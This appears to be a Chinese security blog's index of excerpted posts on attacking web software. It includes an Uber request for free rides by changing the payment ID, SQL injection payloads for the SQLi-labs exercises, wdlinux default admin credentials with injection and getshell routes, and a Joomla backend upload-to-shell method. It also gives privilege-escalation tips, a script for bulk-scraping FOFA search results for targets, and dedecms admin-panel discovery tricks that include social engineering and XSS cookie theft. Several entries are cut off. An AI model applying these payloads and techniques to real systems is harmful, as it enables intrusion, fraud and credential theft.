bug bounty note—-UBER

free uber: POST /api/dial/v2/requests HTTP/1.1 Host: dial.uber.com {“start_latitude”:12.925151699999999,”start_longitude”:77.6657536, “product_id”:”db6779d6-d8da-479f-8ac7-8068f4dade6f”,”payment_method_id”:”xyz”} change payment_method_id reference url :http://www.anandpraka.sh/2017/03/how-anyone-could-have-used-uber-to-ride.html

PHP弱类型漏洞总结

首先说下强弱类型,根据维基百科的定义: In computer programming, programming languages are often colloquially classified as strongly typed or weakly typed (loosely typed). These terms do not have a precise definition, but in general, a strongly typed language is more likely to generate an error or refuse to compile if the argument passed to a function does not closely match […]

SQLi-labs笔记

less-1 单引号报错注入,无回显位,利用一些函数,这里附上一个老毛子的链接:http://blackfan.ru/mysql_game/ payload:http://localhost/sqli-labs/Less-1/?id=1’+union+select+updatexml(0,concat(0x3c,version()),0)%23 less-2 整数型报错注入,无回显位,同上 payload:http://localhost/sqli-labs/Less-2/?id=1+union+select+updatexml(0,concat(0x3c,version()),0)%23 less-3 有单括号加单引号的报错注入,无回显位,利用同上 payload:http://localhost/sqli-labs/Less-3/?id=1′)+union+select+updatexml(0,concat(0x3c,version()),0)%23 less-4 有单括号加双引号的报错注入,无回显位,利用同上: payload:http://localhost/sqli-labs/Less-4/?id=1″)+union+select+updatexml(0,concat(0x3c,version()),0)%23 less-5 同less-1一样 payload:http://localhost/sqli-labs/Less-5/?id=1’+union+select+updatexml(0,concat(0x3c,version()),0)%23 less-6 同less-2一样 payload:http://localhost/sqli-labs/Less-6/?id=1’+union+select+updatexml(0,concat(0x3c,version()),0)%23   less-7 无回显,无报错信息,根据题目信息使用loadfile,但是由于本地权限限制,写不了文件,这里给出payload: payload:http://localhost/sqli-labs/Less-6/?id=1’+union+select+1,2,3+into+outfile+”/var/www/html/sqli-labs/test.txt”–+   less-8  

访问php页面出现500页面解决方法

经常我们在访问php的页面的时候会出现500,那么我们应该怎么解决这个问题呢? 首先,我们先来看下http  500 状态码的意义(以下摘抄自网络): HTTP 500 – 内部服务器错误 HTTP 500.100 – 内部服务器错误 – ASP 错误 HTTP 500-11 服务器关闭 HTTP 500-12 应用程序重新启动 HTTP 500-13 – 服务器太忙 HTTP 500-14 – 应用程序无效 HTTP 500-15 – 不允许请求 global.asa 我们可以看出,出现500状态码是由于服务器内部出现了问题,所以才导致了服务器无法正确返回数据进行服务。 当php网页出现的问题的时候,我们可以通过查看网站容器的日志来定位问题所在,然后解决问题: 下面是我在平时使用时遇到的两个php 500的问题,然后通过检查日志解决了问题: 一、 [Mon Feb 29 05:30:01 2016] [error] [client 104.**.**.83] Directory index forbidden by Options directive: /var/www/html/ [Mon […]

wdlinux漏洞及敏感信息总结

本文收集整理自互联网,如有侵权,请联系本人删除 1、默认配置 默认端口8080   账号admin 密码 wdlinux.cn 敏感目录  /phpmyadmin   / 2、盲注 X-Forwarded-For存在盲注 3、登陆处注入 2.5.9以前版本passwd存在注入 4、越权添加数据库用户 mysql/add_user.php  可以添加数据库用户,结合phpmyadmin可以getshell,wdcp默认的数据库为wdcp (本文会定时更新)

Joomla 1.6之前版本后台拿shell的一种方法

在后台Extensions–>install–>Upload Package File的地方可以上传zip的压缩包,然后根据压缩包中install.xml对包中的文件进行解压缩安装 install.xml: <?xml version=”1.0″ encoding=”utf-8″?> <install type=”language” version=”1.6″ client=”administrator” method=”upgrade”> <name>简体中文</name> <tag>zh-CN</tag> <version>1.6.1</version> <creationDate>2011-03-08</creationDate> <author>Derek Joe(zhous)</author> <authorEmail>[email protected]</authorEmail> <authorurl>www.joomla.cn</authorurl> <copyright>Copyright (C) 2010 CHN Joomla Translation (http://joomlacode.org/gf/project/choice/). All rights reserved.</copyright> <license>GNU General Public License version 2 or later; see LICENSE.txt</license> <description> </description> <files> <filename>index.html</filename> <filename>zh-CN.com_admin.ini</filename> <filename>zh-CN.com_admin.sys.ini</filename> <filename>zh-CN.com_banners.ini</filename> <filename>zh-CN.com_banners.sys.ini</filename> <filename>zh-CN.com_cache.ini</filename> <filename>zh-CN.com_cache.sys.ini</filename> <filename>zh-CN.com_categories.ini</filename> <filename>zh-CN.com_categories.sys.ini</filename> <filename>zh-CN.com_checkin.ini</filename> <filename>zh-CN.com_checkin.sys.ini</filename> <filename>zh-CN.com_config.ini</filename> […]

提权小技巧整理

一、 通常aspx的webshell的运行权限比asp的高 二、 把你的添加用户、开远程的程序更改成program.exe然后放到C盘根目录下会有意想不到的结果,前提是你得有能上传或者远程下载以及C盘有权限

利用搜索引擎批量抓取url

有的时候爆出0day,我们需要抓取大量的url进行测试,这个时候需要用到搜索引擎,常用的有:google,fofa,shodan 下面是整理的利用js对对不同搜索引擎进行批量抓取的代码: fofa: (如何使用:StartReq(搜索语法,开始页码,结束页码) ) StartReq(‘body=wooyun’,1,10) function StartReq(q,startpage,endpage){ for(var i=startpage;i<=endpage;i++){ Req(i+”q=”+encodeURIComponent(q)+”&qbase64=”+btoa(q)); } } function Connection(Sendtype,url,content,callback){ if (window.XMLHttpRequest){ var xmlhttp=new XMLHttpRequest(); } else{ var xmlhttp=new ActiveXObject(“Microsoft.XMLHTTP”); } xmlhttp.onreadystatechange=function(){ if(xmlhttp.readyState==4&&xmlhttp.status==200) { callback(xmlhttp.responseText); } } xmlhttp.open(Sendtype,url,true); xmlhttp.setRequestHeader(“Content-Type”,”application/x-www-form-urlencoded”); xmlhttp.send(content); } function Req(searchString){ var searchurl = “http://fofa.so/search/result?page=”+searchString; Connection(“GET”,searchurl,””,function(callback){ var result = $(callback); result.find(‘div.col-lg-4 a’).each(function(i,o){ var o = $(o); if(o.attr(‘target’)==”_blank”){ if(o.attr(‘href’).indexOf(‘/search/checkapp?all=true&host=’)){ […]

dedecms 找后台方法整理

前言:以上方法整理自互联网,如有侵权,请联系我 update:2015/1/23 首先是默认后台地址:/dede 然后,比较懒的站长会改成/admin,/manage (可以用burpsuite进行目录枚举) 织梦dedecms利用文件查找后台的技巧: 1、/include/dialog/select_media.php?f=form1.murl 2、/include/dialog/select_soft.php 3.使用mysql_error 信息去试试 /data/mysql_error_trace.inc  —— 建议使用该方法屡试屡爽 4./robots.txt /data/admin/ver.txt 5.DedeCmsV5.1 FreeSP1访问 http://127.0.0.1/include/dialog/ … =/include/FCKeditor 可以跳转目录跳转到根目录的方法为: http://127.0.0.1/include/dialog/ … h=/././././././././ 而且DEDECMS在访问不存在的目录时会报错如访问 http://127.0.0.1/include/dialog/ … t0pst0pst0pst0pst0p DedeCMS V5.3.1和最新的DedeCMS V5.5正式版,发现这两个版本已经进行了处理,而且只会列出目录和一些允许显示的文件,PHP是不能显示了,爆路径是一样通用的构造 http://127.0.0.1/include/dialog/ … =/include/FCKeditor 6.大招(转自微尘) 其实方法很简单自己偶然发现的: 通过百度的浏量统计找到后台地址 只要是流量统计网站都可以,其实不用百度, (1)xxoo:弄一个你能看到流量统计的域名 (2)ooxx:去给管理员留言,吧你域名通过网站留言发给他说要加友情链接,他肯定会在后台看的, (3)oxxo:等他看了你的留言,他肯定会打开你的网址,你去自己域名的流量哪里看看     ‘入口页面’   就能看到他网站的后台地址 7.利用xss 这个不能单单算是找后台了,因为xss会x到管理的cookie和后台地址,或者是xss结合csrf可以直接拿shell,详细请见wooyun 8.google hack(8月23日更新 转自:中国杀猪刀) 在搜索引擎里面所有这个关键字,点开连接之后,再去掉这个关键字,他的后台就出来了 原理就是dedecms网站的后台都有这么一个广告,而且通常都是在网站后台后面 所以,只要有这个广告的网站,基本都能暴露后台了。 这是关键字 inurl:?dopost=showad site:xxoo.com   9.织梦某处设计缺陷导致后台地址泄露(转自:wooyun) […]